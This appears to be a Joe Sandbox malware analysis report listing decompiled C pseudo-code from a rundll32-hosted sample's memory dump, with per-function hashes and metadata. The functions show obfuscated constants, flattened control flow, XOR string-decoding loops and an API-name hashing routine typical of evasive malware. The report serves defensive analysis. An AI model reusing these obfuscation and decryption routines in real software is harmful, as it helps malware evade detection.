                                                                                                                                                            				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
                                                                                                                                                            				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
                                                                                                                                                            				 *(_t92 + 0x24) = 0x2326e4;
                                                                                                                                                            				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
                                                                                                                                                            				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
                                                                                                                                                            				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
                                                                                                                                                            				_t66 =  *__edx;
                                                                                                                                                            				_t80 =  &(_t79[1]);
                                                                                                                                                            				_t50 =  *_t79 ^ _t66;
                                                                                                                                                            				 *(_t92 + 0x2c) = _t66;
                                                                                                                                                            				 *(_t92 + 0x30) = _t50;
                                                                                                                                                            				_t30 = _t50 + 1; // 0xb
                                                                                                                                                            				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
                                                                                                                                                            				_t93 = _t92 + 0xc;
                                                                                                                                                            				_t63 = E00377FF2(_t82);
                                                                                                                                                            				 *(_t93 + 0x1c) = _t63;
                                                                                                                                                            				if(_t63 != 0) {
                                                                                                                                                            					_t90 = 0;
                                                                                                                                                            					_t78 = _t63;
                                                                                                                                                            					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
                                                                                                                                                            					if(_t88 != 0) {
                                                                                                                                                            						_t64 =  *(_t93 + 0x1c);
                                                                                                                                                            						do {
                                                                                                                                                            							_t72 =  *_t80;
                                                                                                                                                            							_t80 =  &(_t80[1]);
                                                                                                                                                            							_t73 = _t72 ^ _t64;
                                                                                                                                                            							 *_t78 = _t73;
                                                                                                                                                            							_t78 =  &(_t78[1]);
                                                                                                                                                            							_t74 = _t73 >> 0x10;
                                                                                                                                                            							 *((char*)(_t78 - 3)) = _t73 >> 8;
                                                                                                                                                            							 *(_t78 - 2) = _t74;
                                                                                                                                                            							_t90 = _t90 + 1;
                                                                                                                                                            							 *((char*)(_t78 - 1)) = _t74 >> 8;
                                                                                                                                                            						} while (_t90 < _t88);
                                                                                                                                                            						_t63 =  *(_t93 + 0x18);
                                                                                                                                                            					}
                                                                                                                                                            					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
                                                                                                                                                            				}
                                                                                                                                                            				return _t63;
                                                                                                                                                            			}




















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: &#
                                                                                                                                                            • API String ID: 0-2240308938
                                                                                                                                                            • Opcode ID: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                                            • Instruction ID: 2b003b3a805c900498af494a5cf00a0ddc1f2bc26e97156be66589210a8d9945
                                                                                                                                                            • Opcode Fuzzy Hash: 7b9ad6a671dc95800b82af0f3d55b183cd0e6387ee121b23275acf08ce764799
                                                                                                                                                            • Instruction Fuzzy Hash: BA3159726083518FC305DF28C88581BFBE0FF98718F554B6DE88AA7211D774EA09CB96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E0038DCF7(void* __ecx, signed int* __edx, void* __eflags) {
                                                                                                                                                            				void* _t39;
                                                                                                                                                            				signed int _t43;
                                                                                                                                                            				signed int _t60;
                                                                                                                                                            				signed int _t61;
                                                                                                                                                            				signed int _t63;
                                                                                                                                                            				signed int _t70;
                                                                                                                                                            				unsigned int _t71;
                                                                                                                                                            				unsigned int _t72;
                                                                                                                                                            				signed int _t76;
                                                                                                                                                            				signed int* _t77;
                                                                                                                                                            				signed int* _t78;
                                                                                                                                                            				unsigned int _t80;
                                                                                                                                                            				void* _t86;
                                                                                                                                                            				short _t88;
                                                                                                                                                            				void* _t90;
                                                                                                                                                            				void* _t91;
                                                                                                                                                            
                                                                                                                                                            				_push( *(_t90 + 0x28));
                                                                                                                                                            				_push( *(_t90 + 0x28));
                                                                                                                                                            				_push(__edx);
                                                                                                                                                            				E003820B9(_t39);
                                                                                                                                                            				 *(_t90 + 0x24) = 0xf19f37;
                                                                                                                                                            				_t77 =  &(__edx[1]);
                                                                                                                                                            				 *(_t90 + 0x24) =  *(_t90 + 0x24) * 0x42;
                                                                                                                                                            				 *(_t90 + 0x24) =  *(_t90 + 0x24) ^ 0x3e4cf98f;
                                                                                                                                                            				 *(_t90 + 0x20) = 0xb1a340;
                                                                                                                                                            				 *(_t90 + 0x20) =  *(_t90 + 0x20) + 0xbcd0;
                                                                                                                                                            				 *(_t90 + 0x20) =  *(_t90 + 0x20) ^ 0x00b2d2cb;
                                                                                                                                                            				 *(_t90 + 0x1c) = 0x9743e1;
                                                                                                                                                            				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) | 0x457c67e3;
                                                                                                                                                            				 *(_t90 + 0x1c) =  *(_t90 + 0x1c) ^ 0x45f711d7;
                                                                                                                                                            				_t63 =  *__edx;
                                                                                                                                                            				_t78 =  &(_t77[1]);
                                                                                                                                                            				_t43 =  *_t77 ^ _t63;
                                                                                                                                                            				 *(_t90 + 0x28) = _t63;
                                                                                                                                                            				 *(_t90 + 0x2c) = _t43;
                                                                                                                                                            				_t21 = _t43 + 1; // 0xf19f38
                                                                                                                                                            				_t80 =  !=  ? (_t21 & 0xfffffffc) + 4 : _t21;
                                                                                                                                                            				_t91 = _t90 + 8;
                                                                                                                                                            				_t60 = E00377FF2(_t80 + _t80);
                                                                                                                                                            				 *(_t91 + 0x1c) = _t60;
                                                                                                                                                            				if(_t60 != 0) {
                                                                                                                                                            					_t88 = 0;
                                                                                                                                                            					_t76 = _t60;
                                                                                                                                                            					_t86 =  >  ? 0 :  &(_t78[_t80 >> 2]) - _t78 + 3 >> 2;
                                                                                                                                                            					if(_t86 != 0) {
                                                                                                                                                            						_t61 =  *(_t91 + 0x1c);
                                                                                                                                                            						do {
                                                                                                                                                            							_t70 =  *_t78;
                                                                                                                                                            							_t78 =  &(_t78[1]);
                                                                                                                                                            							_t71 = _t70 ^ _t61;
                                                                                                                                                            							 *_t76 = _t71 & 0x000000ff;
                                                                                                                                                            							_t76 = _t76 + 8;
                                                                                                                                                            							 *((short*)(_t76 - 6)) = _t71 >> 0x00000008 & 0x000000ff;
                                                                                                                                                            							_t72 = _t71 >> 0x10;
                                                                                                                                                            							_t88 = _t88 + 1;
                                                                                                                                                            							 *((short*)(_t76 - 4)) = _t72 & 0x000000ff;
                                                                                                                                                            							 *((short*)(_t76 - 2)) = _t72 >> 0x00000008 & 0x000000ff;
                                                                                                                                                            						} while (_t88 < _t86);
                                                                                                                                                            						_t60 =  *(_t91 + 0x18);
                                                                                                                                                            					}
                                                                                                                                                            					 *((short*)(_t60 +  *(_t91 + 0x20) * 2)) = 0;
                                                                                                                                                            				}
                                                                                                                                                            				return _t60;
                                                                                                                                                            			}




















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: g|E
                                                                                                                                                            • API String ID: 0-3824901942
                                                                                                                                                            • Opcode ID: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                                            • Instruction ID: 17a9803255702da8a20ef56e8f71f2cb2f0e1714b675fd76758ebbd831ceccae
                                                                                                                                                            • Opcode Fuzzy Hash: 434da03f0d83d3a5d6d93c32cdb42b6ac713b1fcc8cbc1b08d0d3376fbdc5032
                                                                                                                                                            • Instruction Fuzzy Hash: 6A319E766083118FC314DF29C48146BF7E0FF98318F424B6EE889AB251D774EA09CB96
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 93%
                                                                                                                                                            			E003751BB() {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                            				void* _t72;
                                                                                                                                                            				intOrPtr _t83;
                                                                                                                                                            				signed int _t87;
                                                                                                                                                            				signed int _t88;
                                                                                                                                                            				signed int _t89;
                                                                                                                                                            
                                                                                                                                                            				_v28 = _v28 & 0x00000000;
                                                                                                                                                            				_v32 = 0x54cf7d;
                                                                                                                                                            				_v16 = 0x3835ff;
                                                                                                                                                            				_v16 = _v16 >> 0xa;
                                                                                                                                                            				_v16 = _v16 * 0x17;
                                                                                                                                                            				_v16 = _v16 ^ 0x00095bb8;
                                                                                                                                                            				_t72 = 0xe98fb1d;
                                                                                                                                                            				_v24 = 0x583681;
                                                                                                                                                            				_t87 = 0x44;
                                                                                                                                                            				_v24 = _v24 / _t87;
                                                                                                                                                            				_v24 = _v24 ^ 0x000eb9f7;
                                                                                                                                                            				_v12 = 0x832b1f;
                                                                                                                                                            				_v12 = _v12 << 5;
                                                                                                                                                            				_v12 = _v12 | 0x242a8544;
                                                                                                                                                            				_v12 = _v12 ^ 0x346a2866;
                                                                                                                                                            				_v8 = 0x6a77bb;
                                                                                                                                                            				_v8 = _v8 >> 0xe;
                                                                                                                                                            				_t88 = 0x19;
                                                                                                                                                            				_v8 = _v8 / _t88;
                                                                                                                                                            				_v8 = _v8 ^ 0x9d9369f0;
                                                                                                                                                            				_v8 = _v8 ^ 0x9d908f3a;
                                                                                                                                                            				_v20 = 0x4802c8;
                                                                                                                                                            				_t89 = 0x21;
                                                                                                                                                            				_v20 = _v20 / _t89;
                                                                                                                                                            				_v20 = _v20 + 0xffffbfc3;
                                                                                                                                                            				_v20 = _v20 ^ 0x000df493;
                                                                                                                                                            				do {
                                                                                                                                                            					while(_t72 != 0x9835b86) {
                                                                                                                                                            						if(_t72 == 0xe98fb1d) {
                                                                                                                                                            							_push(_t72);
                                                                                                                                                            							_push(_t72);
                                                                                                                                                            							 *0x393e04 = E00377FF2(0x134);
                                                                                                                                                            							_t72 = 0x9835b86;
                                                                                                                                                            							continue;
                                                                                                                                                            						}
                                                                                                                                                            						goto L5;
                                                                                                                                                            					}
                                                                                                                                                            					_t83 =  *0x393e04; // 0x0
                                                                                                                                                            					E00380001(_v8, _t83 + 0x18, _v20);
                                                                                                                                                            					_t72 = 0x7dce4e4;
                                                                                                                                                            					L5:
                                                                                                                                                            				} while (_t72 != 0x7dce4e4);
                                                                                                                                                            				return 1;
                                                                                                                                                            			}
















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: f(j4
                                                                                                                                                            • API String ID: 0-3086030595
                                                                                                                                                            • Opcode ID: 0ba396c741af541d3b10779e2cedc5816ae3f0cfa5819a9640fbe76a91118c7c
                                                                                                                                                            • Instruction ID: 1bac9771be97d1a632dd900d8e291a7db26eecac41c96bff2b86d72006fae737
                                                                                                                                                            • Opcode Fuzzy Hash: 0ba396c741af541d3b10779e2cedc5816ae3f0cfa5819a9640fbe76a91118c7c
                                                                                                                                                            • Instruction Fuzzy Hash: 17314771E01219EBCF19DFAAD9895EEBBB1FB44324F20849AE505AB250D3B45F45CF80
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                            			E00372051(void* __edx, signed int _a4, intOrPtr _a8) {
                                                                                                                                                            				intOrPtr _v4;
                                                                                                                                                            				intOrPtr _v8;
                                                                                                                                                            				intOrPtr _v12;
                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				void* _t71;
                                                                                                                                                            				signed int _t78;
                                                                                                                                                            				signed int _t80;
                                                                                                                                                            				signed int _t83;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				signed int _t95;
                                                                                                                                                            				signed short* _t97;
                                                                                                                                                            
                                                                                                                                                            				_push(_a8);
                                                                                                                                                            				_t97 = _a4;
                                                                                                                                                            				_push(_t97);
                                                                                                                                                            				E003820B9(_t71);
                                                                                                                                                            				_v16 = 0x71ca23;
                                                                                                                                                            				_v12 = 0x57f692;
                                                                                                                                                            				_v8 = 0;
                                                                                                                                                            				_v4 = 0;
                                                                                                                                                            				_v20 = 0xd3252c;
                                                                                                                                                            				_v20 = _v20 + 0x4351;
                                                                                                                                                            				_v20 = _v20 + 0xffff5b79;
                                                                                                                                                            				_v20 = _v20 ^ 0x00d2c3f6;
                                                                                                                                                            				_a4 = 0xbb067e;
                                                                                                                                                            				_t83 = 0x11;
                                                                                                                                                            				_a4 = _a4 / _t83;
                                                                                                                                                            				_a4 = _a4 >> 8;
                                                                                                                                                            				_a4 = _a4 ^ 0xac5d3832;
                                                                                                                                                            				_a4 = _a4 ^ 0xac5d3334;
                                                                                                                                                            				_a4 = 0xab60c2;
                                                                                                                                                            				_a4 = _a4 << 0x10;
                                                                                                                                                            				_a4 = _a4 ^ 0x910d5570;
                                                                                                                                                            				_a4 = _a4 >> 4;
                                                                                                                                                            				_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                                                            				if( *_t97 != 0) {
                                                                                                                                                            					do {
                                                                                                                                                            						_t80 = _v20;
                                                                                                                                                            						_a4 = 0xbb067e;
                                                                                                                                                            						_a4 = _a4 / _t83;
                                                                                                                                                            						_a4 = _a4 >> 8;
                                                                                                                                                            						_a4 = _a4 ^ 0xac5d3832;
                                                                                                                                                            						_a4 = _a4 ^ 0xac5d3334;
                                                                                                                                                            						_a4 = 0xab60c2;
                                                                                                                                                            						_a4 = _a4 << 0x10;
                                                                                                                                                            						_a4 = _a4 ^ 0x910d5570;
                                                                                                                                                            						_a4 = _a4 >> 4;
                                                                                                                                                            						_a4 = _a4 ^ 0x0f1cf547;
                                                                                                                                                            						_t92 = _v20 << _a4;
                                                                                                                                                            						_t78 =  *_t97 & 0x0000ffff;
                                                                                                                                                            						_t95 = _v20 << _a4;
                                                                                                                                                            						if(_t78 >= 0x41 && _t78 <= 0x5a) {
                                                                                                                                                            							_t78 = _t78 + 0x20;
                                                                                                                                                            						}
                                                                                                                                                            						_v20 = _t78;
                                                                                                                                                            						_t97 =  &(_t97[1]);
                                                                                                                                                            						_v20 = _v20 + _t92;
                                                                                                                                                            						_v20 = _v20 + _t95;
                                                                                                                                                            						_v20 = _v20 - _t80;
                                                                                                                                                            						_t83 = 0x11;
                                                                                                                                                            					} while ( *_t97 != 0);
                                                                                                                                                            				}
                                                                                                                                                            				return _v20;
                                                                                                                                                            			}
















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: QC
                                                                                                                                                            • API String ID: 0-229404352
                                                                                                                                                            • Opcode ID: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                                            • Instruction ID: 9e76d67506b99547ffb428636133dfe4309ee9f692f1604cafb5cdcfa2781a0c
                                                                                                                                                            • Opcode Fuzzy Hash: f90a2f0d9400246e94e52ce9e9c4602303884de4e781704f0e0226566f48be9f
                                                                                                                                                            • Instruction Fuzzy Hash: 463115719083818BD315DF29C48905BBBE0FFC87A8F558E1DF4C9A6225D7B4C688CB56
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 88%
                                                                                                                                                            			E0038176B(void* __ecx, void* __eflags) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				signed int _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                            				signed int _t87;
                                                                                                                                                            				signed int _t91;
                                                                                                                                                            				signed int _t92;
                                                                                                                                                            				signed int _t93;
                                                                                                                                                            				void* _t102;
                                                                                                                                                            				signed int _t103;
                                                                                                                                                            
                                                                                                                                                            				_v36 = _v36 & 0x00000000;
                                                                                                                                                            				_v40 = 0x355323;
                                                                                                                                                            				_v24 = 0x6eb9b5;
                                                                                                                                                            				_v24 = _v24 + 0x6c21;
                                                                                                                                                            				_t102 = __ecx;
                                                                                                                                                            				_t91 = 0x64;
                                                                                                                                                            				_v24 = _v24 / _t91;
                                                                                                                                                            				_v24 = _v24 ^ 0x0005c519;
                                                                                                                                                            				_v32 = 0xba69a0;
                                                                                                                                                            				_v32 = _v32 << 7;
                                                                                                                                                            				_v32 = _v32 ^ 0x5d3c95d0;
                                                                                                                                                            				_v20 = 0x99612d;
                                                                                                                                                            				_v20 = _v20 | 0x6bf7bfaf;
                                                                                                                                                            				_v20 = _v20 + 0x66ac;
                                                                                                                                                            				_v20 = _v20 ^ 0x6c036c89;
                                                                                                                                                            				_v16 = 0xd72900;
                                                                                                                                                            				_v16 = _v16 + 0xffff2462;
                                                                                                                                                            				_v16 = _v16 ^ 0xa7b97bfd;
                                                                                                                                                            				_v16 = _v16 + 0xffff7578;
                                                                                                                                                            				_v16 = _v16 ^ 0xa76084ba;
                                                                                                                                                            				_v12 = 0xeb6610;
                                                                                                                                                            				_t92 = 0x6f;
                                                                                                                                                            				_v12 = _v12 / _t92;
                                                                                                                                                            				_v12 = _v12 << 0xf;
                                                                                                                                                            				_v12 = _v12 ^ 0x2e835447;
                                                                                                                                                            				_v12 = _v12 ^ 0x21f4cf0c;
                                                                                                                                                            				_v28 = 0x644f8d;
                                                                                                                                                            				_v28 = _v28 << 3;
                                                                                                                                                            				_v28 = _v28 << 0xa;
                                                                                                                                                            				_v28 = _v28 ^ 0x89f1a004;
                                                                                                                                                            				_v8 = 0xbb77ef;
                                                                                                                                                            				_t93 = 0x72;
                                                                                                                                                            				_v8 = _v8 * 0x3c;
                                                                                                                                                            				_v8 = _v8 / _t93;
                                                                                                                                                            				_v8 = _v8 << 6;
                                                                                                                                                            				_v8 = _v8 ^ 0x18aaba50;
                                                                                                                                                            				_t87 = E00380AE0(_v8, _v28);
                                                                                                                                                            				_push(_v12);
                                                                                                                                                            				_t103 = _t87;
                                                                                                                                                            				_push(_t102);
                                                                                                                                                            				_push(_t103);
                                                                                                                                                            				_push(3);
                                                                                                                                                            				E003780E3(_v20, _v16);
                                                                                                                                                            				 *((short*)(_t102 + _t103 * 2)) = 0;
                                                                                                                                                            				return 0;
                                                                                                                                                            			}



















                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #S5
                                                                                                                                                            • API String ID: 0-40889119
                                                                                                                                                            • Opcode ID: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                                            • Instruction ID: 7822d0a3924c875e3cf7acfce2ad2537c9d39cf0ca48097c3d4bed61ac4f6b8c
                                                                                                                                                            • Opcode Fuzzy Hash: d638e8f48ed8eccc1823991200f18c017b773c580a1b9d4be8890f89af7529be
                                                                                                                                                            • Instruction Fuzzy Hash: 883132B2D0020AEBCB48DFE5C94AAEEBBB1FB44704F20809AD515B6250D7B50B15CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E003909B5(void* __ecx, signed int __edx, void* __eflags) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				signed int _v28;
                                                                                                                                                            				char _v32;
                                                                                                                                                            				signed int _v36;
                                                                                                                                                            				signed int _v40;
                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                            				signed int _t77;
                                                                                                                                                            				signed int _t88;
                                                                                                                                                            				signed int _t89;
                                                                                                                                                            
                                                                                                                                                            				_v40 = _v40 & 0x00000000;
                                                                                                                                                            				_v32 = 4;
                                                                                                                                                            				_v52 = 0xab6069;
                                                                                                                                                            				_v48 = 0xcf1f96;
                                                                                                                                                            				_v44 = 0x29044d;
                                                                                                                                                            				_v24 = 0xea6416;
                                                                                                                                                            				_v24 = _v24 | 0x7adbff7d;
                                                                                                                                                            				_v24 = _v24 ^ 0x5afbff7f;
                                                                                                                                                            				_v16 = 0x725236;
                                                                                                                                                            				_v16 = _v16 + 0xffff3c91;
                                                                                                                                                            				_v16 = _v16 << 7;
                                                                                                                                                            				_t88 = 0x2b;
                                                                                                                                                            				_v16 = _v16 / _t88;
                                                                                                                                                            				_v16 = _v16 ^ 0x015653a2;
                                                                                                                                                            				_v12 = 0xbf3984;
                                                                                                                                                            				_v12 = _v12 ^ 0x457d3893;
                                                                                                                                                            				_t89 = 0x44;
                                                                                                                                                            				_v12 = _v12 / _t89;
                                                                                                                                                            				_v12 = _v12 + 0x25bc;
                                                                                                                                                            				_v12 = _v12 ^ 0x0106bc10;
                                                                                                                                                            				_v20 = 0xd655eb;
                                                                                                                                                            				_v20 = _v20 | 0x2344b0aa;
                                                                                                                                                            				_v20 = _v20 * 0x16;
                                                                                                                                                            				_v20 = _v20 ^ 0x147fb4df;
                                                                                                                                                            				_v8 = 0x70d8dc;
                                                                                                                                                            				_v8 = _v8 + 0xe534;
                                                                                                                                                            				_v8 = _v8 ^ 0xb5155b0d;
                                                                                                                                                            				_v8 = _v8 >> 7;
                                                                                                                                                            				_v8 = _v8 ^ 0x01640b3f;
                                                                                                                                                            				_v28 = 0x2d9f47;
                                                                                                                                                            				_v28 = _v28 + 0xffffba71;
                                                                                                                                                            				_v28 = _v28 ^ 0x002c2593;
                                                                                                                                                            				_t77 = E003794EE(_v16, __ecx, _v24 | __edx, __ecx,  &_v36, _v20, _v8,  &_v32, _v28);
                                                                                                                                                            				asm("sbb eax, eax");
                                                                                                                                                            				return  ~_t77 & _v36;
                                                                                                                                                            			}

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 6Rr
                                                                                                                                                            • API String ID: 0-3911282678
                                                                                                                                                            • Opcode ID: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                                            • Instruction ID: 0300a002887d09cf3111665acece1b08533084ec42372056d62fc1b054c06c57
                                                                                                                                                            • Opcode Fuzzy Hash: b16a44260abee8cda7f594ea7713937b30baf920b598495c2ffeaef3aed9b357
                                                                                                                                                            • Instruction Fuzzy Hash: 2E31E1B1D1021EEBDB04CFA6C94A9EEFBB5FB44318F108699D121B6250D3B85B49CF90
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            C-Code - Quality: 91%
                                                                                                                                                            			E00388519(void* __ecx, void* __edx, intOrPtr _a4) {
                                                                                                                                                            				signed int _v8;
                                                                                                                                                            				signed int _v12;
                                                                                                                                                            				signed int _v16;
                                                                                                                                                            				signed int _v20;
                                                                                                                                                            				signed int _v24;
                                                                                                                                                            				void* _t55;
                                                                                                                                                            
                                                                                                                                                            				_push(_a4);
                                                                                                                                                            				_push(__ecx);
                                                                                                                                                            				E003820B9(_t55);
                                                                                                                                                            				_v8 = 0x519131;
                                                                                                                                                            				_v8 = _v8 ^ 0xec4619ea;
                                                                                                                                                            				_v8 = _v8 + 0x48c3;
                                                                                                                                                            				_v8 = _v8 ^ 0x9760daa2;
                                                                                                                                                            				_v8 = _v8 ^ 0x7b7f7884;
                                                                                                                                                            				_v16 = 0xb689a0;
                                                                                                                                                            				_v16 = _v16 + 0x133d;
                                                                                                                                                            				_v16 = _v16 ^ 0x00b72bb6;
                                                                                                                                                            				_v12 = 0xec38eb;
                                                                                                                                                            				_v12 = _v12 * 0x68;
                                                                                                                                                            				_v12 = _v12 | 0x70f3e2c1;
                                                                                                                                                            				_v12 = _v12 + 0xd290;
                                                                                                                                                            				_v12 = _v12 ^ 0x7ff36ca2;
                                                                                                                                                            				_v12 = 0x452aa4;
                                                                                                                                                            				_v12 = _v12 ^ 0xbb670255;
                                                                                                                                                            				_v12 = _v12 >> 1;
                                                                                                                                                            				_v12 = _v12 * 0x2d;
                                                                                                                                                            				_v12 = _v12 ^ 0x7280165f;
                                                                                                                                                            				_v24 = 0xb68a33;
                                                                                                                                                            				_v24 = _v24 + 0xffff2941;
                                                                                                                                                            				_v24 = _v24 ^ 0x00b92c3b;
                                                                                                                                                            				_v12 = 0x340add;
                                                                                                                                                            				_v12 = _v12 | 0xd5e1d7f7;
                                                                                                                                                            				_v12 = _v12 ^ 0xd5f6168b;
                                                                                                                                                            				_v20 = 0x853d17;
                                                                                                                                                            				_v20 = _v20 + 0xcd4d;
                                                                                                                                                            				_v20 = _v20 ^ 0x00837917;
                                                                                                                                                            				return E0037A30C(_v12, _a4, E00371DB9(__ecx), _v20);
                                                                                                                                                            			}

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: 8
                                                                                                                                                            • API String ID: 0-719543824
                                                                                                                                                            • Opcode ID: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                                            • Instruction ID: b3b1b9e09c524c092a0466d96d24ca058c86d0d56e8402b2a525d082676f5dfe
                                                                                                                                                            • Opcode Fuzzy Hash: 12fec3ad41cc48b82a22f75e272f04b08121d484bde9b0f7791330edfee38c34
                                                                                                                                                            • Instruction Fuzzy Hash: E921CFB6C00208EBCF49DFE5CA8689EBFB5FF40308F608189A411BA261D3B54B549B95
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Memory Dump Source
